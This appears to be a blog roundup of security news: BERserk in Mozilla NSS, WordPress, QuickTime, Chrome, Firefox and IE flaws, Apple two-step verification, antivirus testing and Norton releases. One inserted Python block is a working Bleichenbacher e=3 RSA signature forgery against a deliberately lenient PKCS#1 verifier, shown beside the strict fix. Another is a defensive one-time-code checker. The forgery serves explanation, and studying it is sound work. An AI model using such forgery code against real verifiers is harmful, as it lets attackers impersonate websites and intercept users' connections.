What you need to know about BERserk and Mozilla

The Intel Security Advanced Threat Research Team has discovered a critical signature forgery vulnerability in the Mozilla Network Security Services (NSS) crypto library that could allow malicious parties to set up fraudulent sites masquerading as legitimate businesses and other organizations.

The Mozilla NSS library, best known from the Firefox web browser, is also used in Thunderbird, SeaMonkey and other Mozilla products.  Dubbed “BERserk”, the vulnerability lets an attacker forge RSA signatures, and so bypass the certificate-based authentication of websites that use SSL/TLS.  Because a certificate can be forged for any domain, the issue threatens both the integrity and the confidentiality of connections to sites that users perceive as secure.
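As an added illustration (not code from Intel Security, Mozilla or the NSS project), the following Python reproduces the bug class behind forgeries of this kind: a PKCS#1 v1.5 verifier that parses the recovered block leniently and never looks at the bytes after the DigestInfo, beside a strict verifier that compares the whole block. With a public exponent of 3 the lenient parser falls to Bleichenbacher’s 2006 forgery, which needs only the public key. The 2048-bit modulus is a constructed stand-in (only its size matters), the signed data is a hypothetical certificate body, and the specific NSS decoder flaw behind BERserk (its BER length handling) is not reproduced; what is shared is the unchecked region of the block.

```python
import hashlib
import hmac

# Constructed stand-in for a 2048-bit RSA public key with e = 3. Only the size of n
# matters: the forged value s satisfies s**3 < n, so the cube never wraps modulo n and
# the forger needs neither the private key nor a genuine prime factorisation.
E = 3
K = 256   # length of n in bytes
N = int.from_bytes(hashlib.sha512(b"constructed stand-in modulus").digest() * 4, "big") | (1 << 2047) | 1

# DER prefix of the PKCS#1 DigestInfo for SHA-256 (AlgorithmIdentifier + OCTET STRING header).
SHA256_DIGESTINFO_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")


def digest_info(message):
    return SHA256_DIGESTINFO_PREFIX + hashlib.sha256(message).digest()


def encoded_block(signature):
    """Apply the public key: s**e mod n, returned as the K-byte big-endian block EM."""
    return pow(signature, E, N).to_bytes(K, "big")


def verify_lenient(message, signature):
    """Walks 00 01 FF..FF 00 DigestInfo and then stops looking.

    BUG: the bytes after DigestInfo are never checked, so an attacker controls
    K - 11 - len(DigestInfo) bytes of the block. This is the unchecked-bytes
    weakness that BERserk-style forgeries exploit.
    """
    em = encoded_block(signature)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < K and em[i] == 0xFF:
        i += 1
    if i >= K or em[i] != 0x00:
        return False
    i += 1
    di = digest_info(message)
    return em[i:i + len(di)] == di


def verify_strict(message, signature):
    """RFC 3447 style: rebuild the full expected block and require byte equality."""
    di = digest_info(message)
    expected = b"\x00\x01" + b"\xff" * (K - 3 - len(di)) + b"\x00" + di
    return hmac.compare_digest(encoded_block(signature), expected)


def icbrt(n):
    """Floor of the integer cube root, by Newton's method from above."""
    if n <= 0:
        return 0
    x = 1 << ((n.bit_length() + 2) // 3)
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y


def forge(message):
    """Bleichenbacher's e = 3 forgery: pick s so that s**3 begins with a valid-looking block."""
    head = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(message)
    free_bits = 8 * (K - len(head))           # trailing bytes the lenient parser ignores
    target = int.from_bytes(head, "big") << free_bits
    s = icbrt(target) + 1                     # s**3 >= target
    # s**3 - target < 3*s**2 + 3*s + 1, far below 2**free_bits, so the overshoot lands
    # entirely in the ignored region and the head bytes survive intact.
    assert s ** 3 < N, "forgery must not wrap modulo n"
    return s


if __name__ == "__main__":
    tbs = b"constructed tbsCertificate for CN=www.example.com"   # hypothetical data to sign
    s = forge(tbs)
    print("lenient verifier accepts forgery:", verify_lenient(tbs, s))   # True
    print("strict verifier accepts forgery: ", verify_strict(tbs, s))    # False
```

Run it and the lenient verifier accepts the forged value while the strict one rejects it. The durable fix in any verifier is the strict form: reconstruct the entire expected block from the message and compare it byte for byte, instead of parsing whatever the public-key operation recovered and trusting lengths found inside it.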


What users can do immediately

Individual Firefox browser users can take immediate action by updating their browsers with the latest patches from Mozilla.

Google has also released updates for Google Chrome and ChromeOS, as these products also utilize the vulnerable library.

Ensuring that privacy and integrity are maintained is core to what we do at Intel Security.  As this issue unfolds we will continue to provide updates on effective countermeasures and proper mitigation strategies.

Read the whole story at McAfee Blog

WordPress hardened with XSS, DoS and SSRF fixes

With the second security and maintenance release of WordPress 3.5, the developers of the popular open source blogging software have closed 12 bugs, seven of them security issues. In their announcement, the developers “strongly encourage” all users to update all their installations of the software to version 3.5.2 immediately. In addition to the fixed vulnerabilities, the new release also includes some proactive changes intended to harden the platform against attacks.

Security fixes in this release include measures to prevent server-side request forgery (SSRF) attacks. The TinyMCE editor, the external SWFUpload library and other components have been updated to fix cross-site scripting (XSS) holes; WordPress’s own SWFUpload fork is used by the blogging platform to transfer files to the server, while TinyMCE is used as the software’s content editor. A problem that could be exploited by attackers to perform denial-of-service (DoS) attacks on sites that use WordPress’s password protection for posts has also been fixed.

WordPress 3.5.2 is available for download from the project’s web site. Alternatively, existing users can update automatically via Dashboard > Updates in the WordPress admin interface. The source code for WordPress is licensed under the GPLv2 or later.

Cross-posted from Heise-Security.

Apple closes QuickTime vulnerabilities on Windows

Apple has released a security update for its QuickTime media framework for Windows. Version 7.7.4 of the software closes 12 critical security holes causing memory corruption and buffer overflows when processing a number of media formats. The vulnerabilities affect Windows 7, Vista and XP SP2 or later and could be exploited to cause arbitrary code execution and application crashes.

The vulnerabilities affected the playback of MP3, H.263, H.264, TeXML, JPEG, QTIF, Sorenson Video and FPX files as well as the handling of dref, enof and mvhd atoms within the program. All of the problems were reported by researchers working with HP’s Zero Day Initiative, five of them by Tom Gallagher and Paul Bates from Microsoft.

At the time of writing, Apple is not yet listing details about the fixed bugs on its security web site, but has announced that it will do so soon. The 40MB update for the free product can be downloaded from Apple’s Support Downloads web site.

via h-online

Symantec vs AV-Comparatives, Which one do you trust?

Cross-posted from PCMag SecurityWatch:

Last week independent antivirus lab AV-Comparatives released the results of an on-demand antivirus detection test. The fact that Microsoft came in near the bottom wasn’t big news; the fact that Symantec scored even lower was surprising indeed. In a blog post released today, Symantec decried the entire practice of performing on-demand malware scanning tests, calling it “misleading.”

In the early years of antivirus testing, every test was an on-demand scanning test. Researchers would assemble a collection of known malware, run a full scan, and record the percentage of samples detected. Modern labs work hard to devise tests that more closely reflect a user’s real-world experience, taking into account the fact that the vast majority of infections enter the computer from the Internet. Symantec contends that only the real-world sort of test is valid; I don’t entirely agree.

Crippled Protection?
Alejandro Borgia, senior director of product management for Symantec Corporation, stated categorically in his blog post that “the cited detection rates are misleading and not representative of real-world product efficacy.” Borgia said, “These types of file scanning tests are run in artificial environments that cripple all modern protection features.”

It’s true that AV-Comparatives made sure the test systems had Internet access, thereby giving the Symantec installation access to the powerful cloud-based Norton Insight reputation system. When I asked my Symantec contacts about this, they explained that for full power Norton Insight relies on full information, “how the file was obtained, when it was obtained, or from where it was obtained (e.g. URL and IP address).” An on-demand file scanner test on files whose arrival Symantec’s antivirus did not observe is not the same as when the user actually downloads files. That’s true, but it is the same as when a user installs antivirus to clean up an existing malware problem.

The network intrusion prevention components also got no chance to help out, since the file samples were downloaded before installation of antivirus software. Once again, you’d be in a similar situation when installing antivirus for the first time on an infested system. And of course behavior-based detection never kicks in until a program actually begins to execute.

In response to a query about behavior-based protection taking action only after a malicious file is launched, my Symantec contacts pointed out that “behavior” includes more than actions taken by the program. “Our behavioral technology takes into account a program’s location, how it is registered on the system (e.g., what registry keys refer to it), and many other factors,” they explained. “In most cases, the program will be stopped prior to it causing any harm.”

Is It Misleading?
As to the claim that the test is misleading, AV-Comparatives doesn’t agree. The report’s own introduction states that “the file detection rate of a product is only one aspect,” and points to “other test reports which cover different aspects.”

“It is clearly stated, that only one feature of the product is tested,” said Peter Stelzhammer, co-founder of AV-Comparatives. “If Symantec is thinking the file detection feature is worthless, why is it still included in the product?” Stelzhammer pointed out that file detection is needed for initial cleanup, and that PCs don’t always have an Internet connection. Even so, “the test was run with full internet connection and Symantec cloud features have been granted access to their cloud.”

Borgia likens testing file detection alone to testing a car’s safety systems by first disabling everything but the lap belt, stating that such a test would be “entirely flawed.” And yet, a test like that might well identify problems with a weak lap belt, so “entirely flawed” seems an overstatement.

Real World Tests Only?
Borgia notes that Symantec strongly supports real-world tests, tests “that most closely represent the threat environment and utilize all of the proactive technologies provided with a product.” I can hardly disagree, but such tests require a huge amount of time and effort. The blog post holds up the testing performed by Dennis Labs as one shining example. Dennis Labs records the process of infection from real-world URLs and then uses a Web replay system to repeat the exact same process under each antivirus product’s protection. Admirable indeed, but it takes a lot of time and effort.

AV-Comparatives itself runs real-world tests every day, challenging a collection of antivirus products installed in identical test rigs to defend against malware from hundreds of very new real-world malicious URLs. Every month they summarize the data, and every quarter they release a full Real World Protection report. The process is labor-intensive enough that they rely on help from the University of Innsbruck and on partial funding by the Austrian government.

You’d expect Symantec to shine in this real-world test by AV-Comparatives. “Unfortunately,” noted Stelzhammer, “Symantec did not want to join our main test series.” Symantec chose not to participate, they said, because “AV-Comparatives does not offer vendors a subscription focused solely on real-world tests, while opting out of the file scan test.” However, this strategy seems to have backfired. Even though the company didn’t subscribe, AV-Comparatives put Symantec into the on-demand test “as the results have been highly demanded by our readers and the press.”

Multiple Tests Have Value
Symantec’s blog post concludes, “We look forward to the day when all published tests are real-world tests. In the meantime, readers need to beware of artificial tests that show misleading product comparisons.” I, too, would be thrilled to see more tests that match a user’s real-world experience, but I don’t think we can discard file-detection tests.

Consider this. If you purchase antivirus software for a system that never had protection, you’ll expect it to clean up any and all malware, without griping that it wasn’t given a chance to use its network intrusion prevention. In a case like that you’ll probably look for high scores in a test like the AV-Comparatives on-demand test, a test that fairly closely matches your situation.

For ongoing protection, yes, you’ll want a product that earns top scores in real world tests also. So choose a product that scores high in both areas, and in tests from multiple labs. That way you’ll get protection that can take care of any problems existing at installation and also fend off future malware attacks.

Apple adds two-step verification option for Apple IDs

A new security option gives Apple’s customers a way to secure their Apple ID password using their phone.


Cross-posted from Cnet:

Apple today added an extra layer of security to its Apple ID system that can harden the password people use to log in to various Apple services.

Users with an Apple ID can now sign up for two-step verification of their password, a system that sends a four-digit passcode by text message to a user’s phone, and must be used on top of a regular password. In practice, this could keep an account from being compromised by an attacker, unless that person had access to the mobile device too.
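As an added illustration, not Apple’s implementation, here is a minimal server-side second step for a scheme like the one described above, written in Python. The lifetime (five minutes) and attempt limit (three) are assumptions, the user names are constructed, and the clock and code source are injectable only so the behaviour can be exercised offline. The point it makes is that a four-digit code has only 10,000 possible values, so the server rather than the secrecy of the code has to stop a guesser: the code must expire, be accepted only once, and be voided after a few wrong attempts.

```python
import hmac
import secrets
import time

CODE_DIGITS = 4          # the passcode length described above
CODE_TTL_SECONDS = 300   # assumption: a code stays valid for five minutes
MAX_ATTEMPTS = 3         # assumption: 10**4 possible codes, so cap guesses hard


class TwoStepVerifier:
    """Server-side second-factor check, run only after the password has been verified.

    Pending codes live in memory as {user: [code, expiry_timestamp, attempts_left]}.
    The code is stored as issued: hashing a 4-digit value adds nothing against a
    guesser; what protects it is the expiry, single use and the attempt cap.
    """

    def __init__(self, now=time.time, rng=secrets.randbelow):
        self._now = now    # injectable clock (hypothetical hook, for testing expiry)
        self._rng = rng    # injectable code source (secrets.randbelow in real use)
        self._pending = {}

    def issue_code(self, user):
        """Generate a fresh one-time code for `user`, replacing any earlier pending code."""
        code = f"{self._rng(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._pending[user] = [code, self._now() + CODE_TTL_SECONDS, MAX_ATTEMPTS]
        return code   # delivered out of band (SMS); never returned to the browser

    def verify(self, user, submitted):
        """Return True exactly once for the correct, unexpired code; False otherwise."""
        entry = self._pending.get(user)
        if entry is None:
            return False
        code, expiry, attempts_left = entry
        if self._now() > expiry:
            del self._pending[user]          # expired: the user must request a new code
            return False
        if hmac.compare_digest(code.encode(), submitted.encode()):
            del self._pending[user]          # single use
            return True
        entry[2] = attempts_left - 1
        if entry[2] <= 0:
            del self._pending[user]          # locked: the remaining guesses are void
        return False


def brute_force_succeeds(verifier, user):
    """Try every possible code in order against a single issued code."""
    verifier.issue_code(user)
    return any(verifier.verify(user, f"{g:0{CODE_DIGITS}d}") for g in range(10 ** CODE_DIGITS))


if __name__ == "__main__":
    v = TwoStepVerifier()
    code = v.issue_code("alice")              # constructed user name
    print("right code accepted:", v.verify("alice", code))
    print("exhaustive guessing succeeds:", brute_force_succeeds(v, "alice"))
```

With the cap in place an exhaustive guess gets three tries out of ten thousand before the code is voided; without it, the second factor adds nothing that an automated client could not clear in minutes. A production version would also rate-limit code issuance per account, since a fresh code resets the counter.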

The move comes a little less than a year after Apple required users to set up security questions for their online accounts, a common security measure that was notably absent. Once two-step verification is enabled, there are no longer security questions to remember.

“Apple takes customer privacy very seriously, and two-step verification is an even more robust process to ensure our users’ data remains protected,” an Apple spokesperson told CNET. “We are now offering our users the choice to take advantage of this additional layer of security.”

Of note, the feature is currently available only in the U.S., U.K., Ireland, Australia and New Zealand.

Apple, whose rollout of the option was first spotted by 9to5mac, is the latest tech company to offer the feature. Google, which has quite a few more online services than Apple, added it as an option in early 2011. Others, including Facebook, Yahoo, PayPal, and Dropbox, already had the option.

The need for that extra layer of security was highlighted in the woes of journalist Mat Honan, who was targeted in a cascade of account hacking last year. That all kicked off with Honan’s iCloud account and eventually led to access of his personal e-mail and Twitter accounts. That ultimately led to Apple reviewing its security processes for resetting account passwords. Evernote also said it plans to add it later this year, following a cyberattack earlier this month.

More recently, Apple itself was the target of a coordinated attack that used a vulnerability in the Java plug-in to gain access to corporate systems as well as employee computers. In a statement last month, the company said there was no evidence any data was taken. Apple was just one of several companies involved in a series of attacks that also targeted Facebook, The New York Times, The Wall Street Journal, and The Washington Post.

Apple’s user base across its app and media stores and other online services continues to grow. Its last official number, released in January, put it at “over 500 million active accounts.”

Google updates all Chrome editions

H-Online: Google has updated the Stable, Beta and Developer Channels of the desktop version of its Chrome browser with a number of bug fixes and improvements. The Stable Channel update closes seven security vulnerabilities, three of them rated High, and includes bug fixes. New stable Chrome versions for iOS and Android have also been released and include minor improvements. The iOS version of the browser now supports Apple’s Passbook application.

The update to the Stable version of Chrome for Windows, Mac OS X, Linux and Chrome Frame (for running Chrome inside of Internet Explorer) brings it to version 23.0.1271.91. The update closes a security vulnerability in the Mac OS X version of the browser that is caused by a severe rendering bug with the operating system’s driver for Intel graphics cards. This problem was rated by Google as High priority, as was a buffer underflow problem in libxml and a use-after-free bug in the browser’s SVG filters, which have also been fixed.

The Beta Channel of Chrome for Windows, Mac OS X, Linux and Chrome Frame has been updated to version 24.0.1312.25, which includes a number of bug fixes for running applications within the browser, fixes stability issues, and solves two problems with the taskbar in Windows 8. The Beta version of Chrome for Chrome OS is now 23.0.1271.94; the update improves network stability and updates the included Pepper Flash plugin.

In the Developer Channel, Chrome for Windows, Mac OS X and Chrome Frame has been updated to version 25.0.1337.0 which includes a number of fixes and improvements, most noticeably improvements to the Live Tiles functionality for Windows 8 and bug fixes for Flash on Mac OS X. Chrome for the Chrome OS Developer Channel is now at version 25.0.1324.1, which includes a firmware update.

Chrome for iOS has been updated to version 23.0.1271.91 which has introduced the ability to open PDFs in other applications and enables users to save their airline boarding passes and tickets in Apple’s Passbook. The update also brings some security and stability improvements. Chrome for Android is now at version 18.0.1025469 on ARM and version 18.0.1026322 on x86 devices; both updates fix stability issues.

An overview of the different desktop Chrome release channels and platforms is available from the Chromium Project, the open source upstream of Chrome. The listing includes download links for the different versions of the browser. All versions of Chrome should update themselves automatically; on some mobile platforms the user will be prompted to perform the update.


Firefox 16 re-released fixing multiple vulnerabilities

The H-Online: The latest version of Firefox, version 16, has returned to Mozilla’s servers with the release of Firefox 16.0.1 after the discovery of vulnerabilities caused the organization to remove the just-released open source web browser from circulation. Mozilla’s security blog post described the problem as limited to a malicious web site potentially being able to determine the URLs and URL parameters a user had visited, and suggested downgrading to Firefox 15.0.1, despite the numerous critical bugs fixed in Firefox 16.

But on Wednesday, Gareth Heyes, an independent security researcher, posted a proof of concept (PoC) which demonstrated that Firefox 16 did not properly protect the window.location object of other windows: an attacker could open a window pointing at some part of another site (twitter.com in the PoC), wait for that site to redirect the window to a “logged in” page (a twitter.com profile page) and then read the new location and any data embedded in it (the user’s Twitter handle in the PoC). The browser’s same-origin policy should prevent a page from reading the location of a window that is displaying a different origin.

According to Mozilla’s advisory though, a similar but separate critical flaw had been found in Firefox 16, Firefox ESR 10.0.8, SeaMonkey 2.13, Thunderbird 16 and Thunderbird ESR 10.0.8 and earlier, which not only disclosed the location object, but, in Firefox 15 and earlier, had the potential for arbitrary code execution. Firefox 16.0.1 closes both these holes. The presence of the flaw in Firefox 15 does, though, raise questions over the previous advice given by Mozilla to downgrade from 16 to 15.

But these were not the only holes fixed in 16.0.1; another security advisory says developers also identified two of the top crashing bugs in the browser engine and that these bugs showed signs of memory corruption. Mozilla concludes that it could be possible to exploit these holes to execute code. One of the bugs only affected FreeType on mobile devices and is therefore fixed in Firefox 16.0.1 for Android, while the other is a WebSockets bug in Firefox 16 only and is not present in Firefox ESR.

Firefox 16.0.1 is now being pushed out to the Firefox browser’s auto update system and is also available to download via auto-version-detected download or from the all systems and languages page. Firefox 16.0.1 for Android is available in the Google Play store. Thunderbird 16.0.1 is also available for download. Firefox ESR 10.0.9 and Thunderbird ESR 10.0.9 are currently being quality assured and are expected to be released soon. SeaMonkey 2.13.1 has yet to appear on the project’s releases page.


Internet Explorer security hole: Use other browser

TheTelegraph: Internet Explorer users might want to consider upgrading or switching to another browser after a massive security hole was discovered in Windows’ native web browser.

According to security firm Rapid7, Internet Explorer 7, 8 and 9 running on Windows XP, Vista and Windows 7 contain a “zero-day” vulnerability, one that is being exploited before any patch exists, which allows attackers to gain access to your personal data while you browse.

Rapid7 said the exploit would give cyber criminals “the same privileges as the current user”.

It claimed that 41 per cent of US and 32 per cent of global Internet Explorer users could be affected.

Microsoft confirmed that it was aware of the targeted attacks “potentially affecting some versions of Internet Explorer”.

Director of Microsoft Trustworthy Computing, Yunsun Wee, told Fairfax that Internet Explorer 10 is not affected by the issue.

“We recommend customers deploy Microsoft’s Enhanced Mitigation Experience Toolkit 3.0, which provides effective protections without affecting the web browsing experience,” he said. “We will continue to investigate this issue and take further actions as appropriate.”

Adobe fixes ColdFusion security vulnerability

h-Online: On the same day as Microsoft’s September Patch Tuesday, Adobe released an update for ColdFusion to close a security hole in its rapid web application development software. The hotfix for ColdFusion addresses a vulnerability (CVE-2012-2048), which the company rates as important, that could be exploited by a remote attacker to cause a denial-of-service (DoS) condition.

According to Adobe, the unspecified error affects versions 8.0, 8.0.1, 9.0 to 9.0.2, and 10 of ColdFusion for Windows, Mac OS X and UNIX. Installing the provided hotfix corrects the problem; download links and installation instructions for each affected version are provided on the APSB12-21 technote page. All users are advised to download and apply the hotfix. Adobe credits UK developer David Boyer for finding and reporting the problem.


Symantec releases Norton 2013 security suites


BetaNews: Symantec has released brand new versions of its Norton security packages for Windows: Norton AntiVirus 2013, Norton Internet Security 2013 and Norton 360 2013. It’s the first time all three packages have been updated simultaneously, and the branding has been amended to remove all references to a year, so the products are now simply named Norton AntiVirus, Norton Internet Security and Norton 360.

The 2013 versions come with what Symantec describes as “five layers of patented protection”, which include stronger social networking and anti-scam protection. There’s also full, certified support for Windows 8 and the promise of better performance on multi-core CPUs.

Symantec has focused its efforts on two related areas of protection for the 2013 releases, providing stronger protection for those using social networking sites. One in ten social network users has, according to the current annual Norton CyberCrime Report, fallen prey to fake links or scams, and so a new Scam Insight tool provides warnings against potentially risky websites along with an improved Norton Safe Web for Facebook app, providing users with the ability to quickly scan their timeline for potential scams and fake links.

Other improvements to existing protection include more rapid updates for the Insight file reputation database, which now also tracks IP addresses to help determine where threats are originating from.

Norton’s 2013 products are also fully certified for Windows 8. This includes integration with Windows 8’s Early Launch Anti-Malware (ELAM) technology, which permits security software to be up and running much earlier in the boot process than was the case with Windows 7, and which helps nullify certain rootkits. Also implemented is a new memory heap manager to help block and minimize the dangers from memory exploits.

The user interface has also been tweaked to be more Windows 8-friendly, with touch support and tile-based buttons. Staying up to date has been made simpler too, with all product updates now delivered automatically, and reboots eliminated from the install and update process.

The 2013 product line comes with a Network Cost Awareness feature – choose Settings > Network Security Settings > Network Cost Awareness and click Configure – that allows specific network connections to be set to Economy, to prevent unnecessary updates from being downloaded on bandwidth-limited connections such as 3G.

Finally, all three Norton 2013 products are engineered to take advantage of newer multi-core processors and inbuilt technologies in Windows 8 to deliver faster startup and shutdown times than their immediate predecessors. Sadly, boot times remain a little long in Windows 7, although the apps’ overall effect on system performance is light. Other performance tweaks include better support for digital media, plus reduced power consumption to help extend battery life.

Norton AntiVirus 2013 FINAL, Norton Internet Security 2013 FINAL and Norton 360 2013 are all available now as free 30-day trial downloads for PCs running Windows XP SP2 or later. Prices start from $49.99 for a single-user, 12-month license of Norton AntiVirus 2013 FINAL, with three-user licenses for Norton Internet Security 2013 and Norton 360 2013 costing $79.99 and $89.99 respectively.